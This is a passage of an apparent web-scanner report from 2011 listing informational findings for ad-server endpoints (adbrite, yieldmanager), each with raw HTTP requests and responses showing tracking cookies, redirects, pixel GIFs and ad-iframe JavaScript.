<u]Fa!#wmL!!!!$<u]Fa!#wnK!!!!$<u]Fa!#wnM!!!!$<u]Fa!#xI*!!!!$<u]Fa!#xu[!!!!#<u]Bd!#yM#!!!!$<u]Fa!$#WA!!!!$<u]Fa!$#r<!!!!#<td)R!$$LL!!!!#<u]Fb!$%,!!!!!$<u]Fa!$%SB!!!!$<u]Fa!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response 1

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0114.2rm.ac4
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:41:19 GMT
Pragma: no-cache
Content-Length: 1074
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://ads.bluelithium.com/iframe3?wT8nBQNzEgCKRUkAAAAAAAoODwAAAAAAAgAAAAIAAAAAAP8AAAACDMxcHgAAAAAAFCMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAA..9fSPlwxT8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABise7jrxPsCRA3PqXHP0hdS2Yq2FvxM78ezh9fAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302540075598%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D4049171621%26B%3D10%26r%3D0,86c8caf4-645a-11e0-b7b4-003048d6d216\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 4801930;
rm_data.offer_type = 19;
rm_data.entity_id = 99081;
if (window.rm_crex_data) {rm_crex_data.push(4801930);}

Request 2

GET /imp?Z=300x250&s=1209091&_salt=4049171621&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#]!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!$<u]Fa!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!$<u]Fa!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!$<u]Fa!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(X!!!!#<uw3o!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!$<u]Fa!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!$<u]Fa!#Q+^!!!!$<u]Fa!#Q+o!!!!$<u]Fa!#Q+p!!!!$<u]Fa!#Q,.!!!!$<u]Fa!#RY.!!!!$<u]Fa!#SCj!!!!$<u]Fa!#SCk!!!!$<u]Fa!#XA!!!!!$<u]Fa!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!$<u]Fa!#^Bo!!!!$<u]Fa!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!$<u]Fa!#a3k!!!!$<u]Fa!#aG>!!!!$<u]Fa!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!$<u]Fa!#eaO!!!!$<u]Fa!#f8c!!!!$<u]Fa!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!$<u]Fa!#g[h!!!!$<u]Fa!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!$<u]Fa!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!$<u]Fa!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!$<u]Fa!#usu!!!!$<u]Fa!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!$<u]Fa!#wmL!!!!$<u]Fa!#wnK!!!!$<u]Fa!#wnM!!!!$<u]Fa!#xI*!!!!$<u]Fa!#xu[!!!!#<u]Bd!#yM#!!!!$<u]Fa!$#WA!!!!$<u]Fa!$#r<!!!!#<td)R!$$LL!!!!#<u]Fb!$%,!!!!!$<u]Fa!$%SB!!!!$<u]Fa!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response 2

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0115.2rm.ac4
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:41:40 GMT
Pragma: no-cache
Content-Length: 790
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://ads.bluelithium.com/iframe3?AAAAAANzEgBR3HYAAAAAANC4HQAAAAAAAgAAAAIAAAAAAP8AAAACDMxcHgAAAAAASTsnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAADA5Zmt1z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGMG77xBPsCbULhUT0ZR7a5A9YA.VeCbxsKfajAAAAAA==,,,Z%3D300x250%26s%3D1209091%26_salt%3D4049171621%26B%3D10%26r%3D0,93639d8e-645a-11e0-84d1-003048d6d894\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 7789649;
rm_data.offer_type = 35;
rm_data.entity_id = 101861;
if (window.rm_crex_data) {rm_crex_data.push(7789649);}
8.2. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Request 1

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 1

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:35:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052ad@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:57 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:57 GMT
Content-Length: 0

Request 2

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 2

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:36:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=;Path=/;Domain=.adbrite.com;Expires=Sat, 09-Apr-2011 12:36:32 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:32 GMT
Content-Length: 0

8.3. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Request 1

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b2@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:02 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:02 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=;Path=/;Domain=.adbrite.com;Expires=Sat, 09-Apr-2011 12:36:33 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:33 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.4. http://ads.adbrite.com/adserver/vdi/712156  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Request 1

GET /adserver/vdi/712156?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Sun, 10-Apr-2011 00:22:01 GMT
Set-Cookie: vsd=0@1@4d9fa6a9@s7.addthis.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 00:22:01 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 00:22:01 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/712156?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:24 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Sun, 10-Apr-2011 00:22:24 GMT
Set-Cookie: vsd=;Path=/;Domain=.adbrite.com;Expires=Sat, 09-Apr-2011 00:22:24 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 00:22:24 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.5. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Request 1

GET /adserver/vdi/742697?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 12-Apr-2011 16:41:21 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D";Path=/;Domain=.adbrite.com;Expires=Thu, 08-Apr-2021 16:41:21 GMT
Set-Cookie: vsd=0@1@4da32f31@cdn.turn.com;Path=/;Domain=.adbrite.com;Expires=Wed, 13-Apr-2011 16:41:21 GMT
Set-Cookie: fq=;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 16:41:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/742697?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
